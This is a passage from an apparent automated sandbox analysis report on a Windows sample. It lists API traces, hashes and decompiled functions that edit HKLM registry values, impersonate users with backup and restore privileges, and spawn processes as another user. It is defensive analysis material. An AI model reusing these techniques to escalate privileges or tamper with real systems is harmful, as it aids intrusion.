                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3Version$CriticalInitializeSection_memset
                                                                                                        • String ID: Vista$W2K$Win2003$Win2008$Win3.11$Win7$Win95$Win98$Win98SE$Win?$WinMe$WinNT$WinXP
                                                                                                        • API String ID: 440661341-467695568
                                                                                                        • Opcode ID: 7650b10e9f349b94a245721405b547f5214d6b6b229de57107e143fa164df465
                                                                                                        • Instruction ID: db7eb224f653a959da8366efe4caee1ed58c755f50c0700b446445da0092859c
                                                                                                        • Opcode Fuzzy Hash: 7650b10e9f349b94a245721405b547f5214d6b6b229de57107e143fa164df465
                                                                                                        • Instruction Fuzzy Hash: 3C71A37490514CEEDB04EF55C891BEDB778AF65784F10408EE10567192EF386F08DBAA
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709845B0, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 162registrystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E709845B0() {
				short _v524;
				char _v724;
				short _v728;
				int _v732;
				int _v740;
				char _v744;
				char _v752;
				int _v756;
				int _v760;
				int _v764;
				int _v768;
				void* _v772;
				void* _v776;
				void* _v780;
				void* _v784;
				int _t63;
				WCHAR* _t70;
				short* _t80;
				int _t101;
				int _t104;

				_t80 =  *0x7098f634; // 0x751780
				_t101 = 0;
				_v768 = 0;
				_v776 = 0;
				if(RegOpenKeyExW(0x80000002, _t80, 0, 0xf003f,  &_v776) != 0) {
					L16:
					return _t101;
				}
				_v752 = 0;
				_v732 = 0;
				_v728 = 0;
				_v740 = 0;
				if(RegQueryInfoKeyW(_v776, 0, 0, 0,  &_v752,  &_v732, 0,  &_v728,  &_v740, 0, 0, 0) != 0 || _v752 <= 0) {
					L15:
					RegCloseKey(_v776);
					goto L16;
				} else {
					_v760 = 0;
					_t104 = 4;
					do {
						_v744 = 0x104;
						if(RegEnumKeyExW(_v776, _v760,  &_v524,  &_v744, 0, 0, 0, 0) != 0) {
							goto L13;
						}
						_v772 = 0;
						if(RegOpenKeyExW(_v776,  &_v524, 0, 0x2001b,  &_v772) != 0) {
							goto L13;
						}
						_v756 = 1;
						_v764 = 0x64;
						if(RegQueryValueExW(_v776, StrChrW(0x7098c948, 0x43), 0,  &_v756,  &_v724,  &_v764) == 0) {
							_t70 =  *0x7098f588; // 0x79a25c
							if(lstrcmpiW( &_v728, _t70) == 0) {
								_v768 = _t104;
								_v760 = _t104;
								_v752 = 0;
								if(RegQueryValueExW(_v780, StrChrW(0x7098c924, 0x43), 0,  &_v760,  &_v752,  &_v768) == 0) {
									_v744 = 0x89;
									if(_v756 == 0x89 || RegSetValueExW(_v784, StrChrW(0x7098c924, 0x43), 0, _t104,  &_v744, _t104) == 0) {
										_v776 = 1;
									}
								}
							}
						}
						CloseHandle(_v776);
						if(_v772 != 0) {
							break;
						}
						L13:
						_t63 = _v760 + 1;
						_v760 = _t63;
					} while (_t63 < _v752);
					_t101 = _v768;
					goto L15;
				}
			}























                                                                                                        0x709845b6
                                                                                                        0x709845cc
                                                                                                        0x709845d3
                                                                                                        0x709845d7
                                                                                                        0x709845e3
                                                                                                        0x7098478f
                                                                                                        0x70984799
                                                                                                        0x70984799
                                                                                                        0x70984609
                                                                                                        0x7098460d
                                                                                                        0x70984611
                                                                                                        0x70984615
                                                                                                        0x70984621
                                                                                                        0x70984784
                                                                                                        0x70984789
                                                                                                        0x00000000
                                                                                                        0x70984633
                                                                                                        0x70984641
                                                                                                        0x70984645
                                                                                                        0x70984648
                                                                                                        0x70984663
                                                                                                        0x70984673
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70984691
                                                                                                        0x7098469d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709846ba
                                                                                                        0x709846c2
                                                                                                        0x709846d6
                                                                                                        0x709846dc
                                                                                                        0x709846ef
                                                                                                        0x70984708
                                                                                                        0x7098470c
                                                                                                        0x70984710
                                                                                                        0x70984720
                                                                                                        0x70984727
                                                                                                        0x7098472f
                                                                                                        0x70984752
                                                                                                        0x70984752
                                                                                                        0x7098472f
                                                                                                        0x70984720
                                                                                                        0x709846ef
                                                                                                        0x7098475f
                                                                                                        0x70984769
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098476b
                                                                                                        0x7098476f
                                                                                                        0x70984770
                                                                                                        0x70984774
                                                                                                        0x7098477e
                                                                                                        0x00000000
                                                                                                        0x70984783

                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,00751780,00000000,000F003F,750D2940,750D2940,7742C0B0), ref: 709845DB
                                                                                                        • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,00000000,00000000,00000000), ref: 70984619
                                                                                                        • RegEnumKeyExW.ADVAPI32 ref: 7098466B
                                                                                                        • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,0002001B,00000000), ref: 70984695
                                                                                                        • StrChrW.SHLWAPI(7098C948,00000043,00000000,?,?,?), ref: 709846CA
                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000), ref: 709846D2
                                                                                                        • lstrcmpiW.KERNEL32(?,0079A25C), ref: 709846E7
                                                                                                        • StrChrW.SHLWAPI(7098C924,00000043,00000000,?,?,?), ref: 70984714
                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000), ref: 7098471C
                                                                                                        • StrChrW.SHLWAPI(7098C924,00000043,00000000,00000004,00000001,00000004), ref: 70984740
                                                                                                        • RegSetValueExW.ADVAPI32(?,00000000), ref: 70984748
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 7098475F
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 70984789
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: QueryValue$CloseOpen$EnumHandleInfolstrcmpi
                                                                                                        • String ID: d
                                                                                                        • API String ID: 678791777-2564639436
                                                                                                        • Opcode ID: aa2fdf187c0df02acbb503b5eaefb0c7f6bfa8dea09f0da82b2d1ec0b7a493af
                                                                                                        • Instruction ID: 91302be5fec184ecfb788934997a1358cb50f048c1c3deaa8cb0bd6fd80a0b92
                                                                                                        • Opcode Fuzzy Hash: aa2fdf187c0df02acbb503b5eaefb0c7f6bfa8dea09f0da82b2d1ec0b7a493af
                                                                                                        • Instruction Fuzzy Hash: 3151FAB2118305AFD301DF65CC84EABB7FDFB89748F10492DF69696290E774E9048B62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004C8071, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 168threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004C8078
                                                                                                        • _memset.LIBCMT ref: 004C80B4
                                                                                                        • RevertToSelf.ADVAPI32(00000001,00000001,00000001,?,?,000000A8), ref: 004C80CB
                                                                                                        • _memset.LIBCMT ref: 004C815F
                                                                                                        • ImpersonateLoggedOnUser.ADVAPI32(00000001,?,?,000000A8), ref: 004C81EA
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004C821A
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004C8265
                                                                                                        Strings
                                                                                                        • ImpersonateUser: LoadUserProfile failed, xrefs: 004C81B5
                                                                                                        • SeRestorePrivilege, xrefs: 004C8185
                                                                                                        • ImpersonateUser: ImpersonateLoggedOnUser failed, xrefs: 004C8203
                                                                                                        • ImpersonateUser: GetCurrentUserToken failed, xrefs: 004C811E
                                                                                                        • ImpersonateUser: RevertToSelf failed, xrefs: 004C80E4
                                                                                                        • SeBackupPrivilege, xrefs: 004C8171
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CurrentThread_memset$CriticalImpersonateInitializeLoggedRevertSectionSelfUser
                                                                                                        • String ID: ImpersonateUser: GetCurrentUserToken failed$ImpersonateUser: ImpersonateLoggedOnUser failed$ImpersonateUser: LoadUserProfile failed$ImpersonateUser: RevertToSelf failed$SeBackupPrivilege$SeRestorePrivilege
                                                                                                        • API String ID: 2442580533-1466847920
                                                                                                        • Opcode ID: 426c615d72a7aead0c0009b6b602a53cd0ad1a0f8de7c514c356b84a31469941
                                                                                                        • Instruction ID: 3ca44e481f02f0b0749d78344e7c9914928ca7f834ac87af0ed759489b04262c
                                                                                                        • Opcode Fuzzy Hash: 426c615d72a7aead0c0009b6b602a53cd0ad1a0f8de7c514c356b84a31469941
                                                                                                        • Instruction Fuzzy Hash: 915147B4804388AEEB21EF65C886FAE7FB4AF55304F14805EF48557292DB385A44CB66
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004E1281, Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 243COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004E128F
                                                                                                          • Part of subcall function 0050E92E: __EH_prolog3.LIBCMT ref: 0050E935
                                                                                                          • Part of subcall function 0050E764: __EH_prolog3.LIBCMT ref: 0050E76B
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 0050E96A: __EH_prolog3.LIBCMT ref: 0050E971
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                          • Part of subcall function 004A1847: __EH_prolog3_GS.LIBCMT ref: 004A184E
                                                                                                          • Part of subcall function 004A1847: InitializeCriticalSection.KERNEL32(?,00000028,004E1319,?,00000000,?,00000000,00000000,0078B904,00000000,PingResult,00000000,000000C4), ref: 004A1863
                                                                                                          • Part of subcall function 004A1847: _swprintf.LIBCMT ref: 004A1881
                                                                                                          • Part of subcall function 004A18A4: __EH_prolog3_GS.LIBCMT ref: 004A18AB
                                                                                                          • Part of subcall function 004A18A4: InitializeCriticalSection.KERNEL32(?,00000028,004E3FC0,00000000,00000000,?,?,00000338,?,?,?,?,?,?,Default), ref: 004A18C0
                                                                                                          • Part of subcall function 004A18A4: _swprintf.LIBCMT ref: 004A18DE
                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004E90F2,00000000,?,?,?,?,?,?,?,?,Default,?,?), ref: 004A1C05
                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,Default,?,?,?,?,00000000,?,?), ref: 004A1C45
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalSection$Initialize$H_prolog3__swprintf$DeleteEnterLeave
                                                                                                        • String ID: HTTPIN$HTTPPING$HTTP_$PING_ERROR$PING_NOCONNECT$PING_RUNNING$PING_SERVERONLY$PingResult$TCPIN$TCPPING$TCP_
                                                                                                        • API String ID: 3407804901-2695655189
                                                                                                        • Opcode ID: 120595d521a4a9b2571dae06c895172b02b550510ae2866fda05203d2b1ed375
                                                                                                        • Instruction ID: 77eb52bb5fd74d7fbc4ecb358810aabdfbe56e85957c85d4d8cbdc750f51cc6e
                                                                                                        • Opcode Fuzzy Hash: 120595d521a4a9b2571dae06c895172b02b550510ae2866fda05203d2b1ed375
                                                                                                        • Instruction Fuzzy Hash: 6AA16F7141418CEADB15EBA4CD91FED7B68BF22308F14809EF446671A2EB786F08C765
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 005540A0, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 164libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,00899BB8,00542D81,00899BB8,Microsoft Visual C++ Runtime Library,00012010), ref: 005540CD
                                                                                                        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 005540E9
                                                                                                          • Part of subcall function 00542E64: TlsGetValue.KERNEL32(00000000,00542ED9,00000000,005540AE,00000000,00000000,00000314,?,?,?,00899BB8,00542D81,00899BB8,Microsoft Visual C++ Runtime Library,00012010), ref: 00542E71
                                                                                                          • Part of subcall function 00542E64: TlsGetValue.KERNEL32(00000005,?,?,?,00899BB8,00542D81,00899BB8,Microsoft Visual C++ Runtime Library,00012010), ref: 00542E88
                                                                                                          • Part of subcall function 00542E64: RtlEncodePointer.NTDLL(?,?,?,?,00899BB8,00542D81,00899BB8,Microsoft Visual C++ Runtime Library,00012010), ref: 00542EC6
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00554106
                                                                                                          • Part of subcall function 00542E64: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00899BB8,00542D81,00899BB8,Microsoft Visual C++ Runtime Library,00012010), ref: 00542E9D
                                                                                                          • Part of subcall function 00542E64: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00542EB8
                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0055411B
                                                                                                        • __invoke_watson.LIBCMT ref: 0055413C
                                                                                                          • Part of subcall function 0053496B: _memset.LIBCMT ref: 005349F7
                                                                                                          • Part of subcall function 0053496B: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 00534A15
                                                                                                          • Part of subcall function 0053496B: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 00534A1F
                                                                                                          • Part of subcall function 0053496B: UnhandledExceptionFilter.KERNEL32(00899BB8,?,?,00000000), ref: 00534A29
                                                                                                          • Part of subcall function 0053496B: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 00534A44
                                                                                                          • Part of subcall function 0053496B: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 00534A4B
                                                                                                          • Part of subcall function 00542EDB: TlsGetValue.KERNEL32(00000000,00542F8B,?,0054292D), ref: 00542EE8
                                                                                                          • Part of subcall function 00542EDB: TlsGetValue.KERNEL32(00000005,?,0054292D), ref: 00542EFF
                                                                                                          • Part of subcall function 00542EDB: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,0054292D), ref: 00542F14
                                                                                                          • Part of subcall function 00542EDB: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00542F2F
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00554150
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00554168
                                                                                                        • __invoke_watson.LIBCMT ref: 005541DB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerEncodeLibraryLoadPointerPresentTerminate_memset
                                                                                                        • String ID: GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                        • API String ID: 1761029719-1046234306
                                                                                                        • Opcode ID: e792a2baea4217374685133888b3c476f50299704ecca38dc99a77ca614292d2
                                                                                                        • Instruction ID: 1bf957bb3930da4bf3bc1a787134835c67a700edfaad2c2e300750af9b68224f
                                                                                                        • Opcode Fuzzy Hash: e792a2baea4217374685133888b3c476f50299704ecca38dc99a77ca614292d2
                                                                                                        • Instruction Fuzzy Hash: 83419371D00226AACF34EFB19C99AAE7FB8BA5431AF54452BF801E3150DB7489C4CE91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70983A80, Relevance: 21.1, APIs: 14, Instructions: 99memorystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 92%
                                                                                                        			E70983A80(void* __ebp, void* _a4) {
				long _v4;
				void* _v8;
				int _v12;
				void* _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				short* _t25;
				WCHAR* _t29;
				int _t36;
				intOrPtr _t37;
				void* _t41;
				void* _t50;
				signed int _t56;
				WCHAR* _t57;
				int* _t61;

				_t61 =  &_v12;
				if(_a4 == 0) {
					L18:
					return 0;
				}
				_t41 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
				_v8 = _t41;
				if(_t41 == 0) {
					L17:
					HeapFree(GetProcessHeap(), 0, _a4);
					goto L18;
				}
				_v4 = 0;
				_t25 = GetCommandLineW();
				_v12 = 0;
				_t50 = CommandLineToArgvW(_t25,  &_v12);
				if(_t50 == 0) {
					L16:
					HeapFree(GetProcessHeap(), 0, _t41);
					goto L17;
				}
				_t29 = _v20;
				if(_t29 <= 1) {
					L14:
					LocalFree(_t50);
					if(_v12 != 0) {
						_push( *_v4);
						E70983760(_t41);
					}
					goto L16;
				}
				_t56 = 1;
				do {
					if(_t56 >= _t29 - 1) {
						goto L8;
					}
					if(lstrcmpiW( *(_t50 + _t56 * 4), StrChrW(0x7098c530, 0x2d)) == 0) {
						_t57 =  *(_t50 + 4 + _t56 * 4);
						_v16 = 1;
						_t36 = PathIsRelativeW(_t57);
						_t37 =  *0x7098f5d0; // 0xa4b6c8
						if(_t36 == 0) {
							_t37 = 0x7098c560;
						}
						_push(_t57);
						_push(_t37);
						wsprintfW(_v24, StrChrW(0x7098c69c, 0x22));
						_t61 =  &(_t61[4]);
						L13:
						_t41 = _v16;
						goto L14;
					}
					_t29 = _v24;
					L8:
					_t56 = _t56 + 1;
				} while (_t56 < _t29);
				goto L13;
			}


















                                                                                                        0x70983a80
                                                                                                        0x70983a88
                                                                                                        0x70983ba9
                                                                                                        0x70983bae
                                                                                                        0x70983bae
                                                                                                        0x70983aa6
                                                                                                        0x70983aa8
                                                                                                        0x70983aae
                                                                                                        0x70983b97
                                                                                                        0x70983ba1
                                                                                                        0x00000000
                                                                                                        0x70983ba8
                                                                                                        0x70983ab5
                                                                                                        0x70983abd
                                                                                                        0x70983ac9
                                                                                                        0x70983ad7
                                                                                                        0x70983adb
                                                                                                        0x70983b84
                                                                                                        0x70983b90
                                                                                                        0x00000000
                                                                                                        0x70983b96
                                                                                                        0x70983ae1
                                                                                                        0x70983ae8
                                                                                                        0x70983b66
                                                                                                        0x70983b67
                                                                                                        0x70983b72
                                                                                                        0x70983b7a
                                                                                                        0x70983b7c
                                                                                                        0x70983b81
                                                                                                        0x00000000
                                                                                                        0x70983b72
                                                                                                        0x70983af7
                                                                                                        0x70983b00
                                                                                                        0x70983b05
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983b19
                                                                                                        0x70983b26
                                                                                                        0x70983b2b
                                                                                                        0x70983b33
                                                                                                        0x70983b3b
                                                                                                        0x70983b40
                                                                                                        0x70983b42
                                                                                                        0x70983b42
                                                                                                        0x70983b47
                                                                                                        0x70983b48
                                                                                                        0x70983b58
                                                                                                        0x70983b5e
                                                                                                        0x70983b61
                                                                                                        0x70983b61
                                                                                                        0x00000000
                                                                                                        0x70983b65
                                                                                                        0x70983b1b
                                                                                                        0x70983b1f
                                                                                                        0x70983b1f
                                                                                                        0x70983b20
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 70983A9D
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70983AA0
                                                                                                        • GetCommandLineW.KERNEL32 ref: 70983ABD
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,?), ref: 70983AD1
                                                                                                        • StrChrW.SHLWAPI(7098C530,0000002D), ref: 70983B0E
                                                                                                        • lstrcmpiW.KERNEL32(00000000,00000000), ref: 70983B15
                                                                                                        • PathIsRelativeW.SHLWAPI(?), ref: 70983B33
                                                                                                        • StrChrW.SHLWAPI(7098C69C,00000022,00A4B6C8,?), ref: 70983B50
                                                                                                        • wsprintfW.USER32 ref: 70983B58
                                                                                                        • LocalFree.KERNEL32(00000000), ref: 70983B67
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 70983B8D
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70983B90
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 70983B9E
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70983BA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$FreeProcess$CommandLine$AllocArgvLocalPathRelativelstrcmpiwsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 3145760940-0
                                                                                                        • Opcode ID: 7dff3b0e10122d565f22661e742478265c63fc835b83ffe9902bfb6b0002b570
                                                                                                        • Instruction ID: 9a3295d914340edbb4bad5544717104404aa7a3362ddfe4d1ff87a445b5b6d07
                                                                                                        • Opcode Fuzzy Hash: 7dff3b0e10122d565f22661e742478265c63fc835b83ffe9902bfb6b0002b570
                                                                                                        • Instruction Fuzzy Hash: C53146B2518301AFD200DB99CC88B6AB7A8EB84715F108529F956D73D0E774E8048BA3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70983760, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 84sleepprocessCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 69%
                                                                                                        			E70983760(intOrPtr _a8) {
				WCHAR* _v28;
				struct _STARTUPINFOW _v100;
				struct _PROCESS_INFORMATION _v116;
				long _v120;
				void* _v124;
				void* _t19;
				void* _t27;
				WCHAR* _t30;
				void* _t38;
				intOrPtr _t39;

				_push(_a8);
				_t19 = E70983600();
				_t38 = _t19;
				_t39 = 0;
				if(_t38 != 0) {
					_push(0);
					_push(_t38);
					_push( &(_v100.lpDesktop));
					_v100.lpTitle = 0x20;
					_v100.lpDesktop = 0;
					L7098BF92();
					if(_t19 != 0) {
						_v100.cb = 0x420;
					}
					_push(0x44);
					_push( &(_v100.dwY));
					L7098BF02();
					_v100.lpTitle = 0x44;
					_v100.dwX = StrChrW(0x7098c678, 0x57);
					_push(0x10);
					_push( &(_v116.dwProcessId));
					L7098BF02();
					_t30 = _v28;
					while(CreateProcessAsUserW(_t38, 0, _t30, 0, 0, 0, _v120, _v124, 0,  &_v100,  &_v116) == 0) {
						Sleep(0x1f4);
						_t39 = _t39 + 1;
						if(_t39 < 0x78) {
							continue;
						}
						L8:
						_t27 = _v124;
						if(_t27 != 0) {
							_push(_t27);
							L7098BF8C();
						}
						return CloseHandle(_t38);
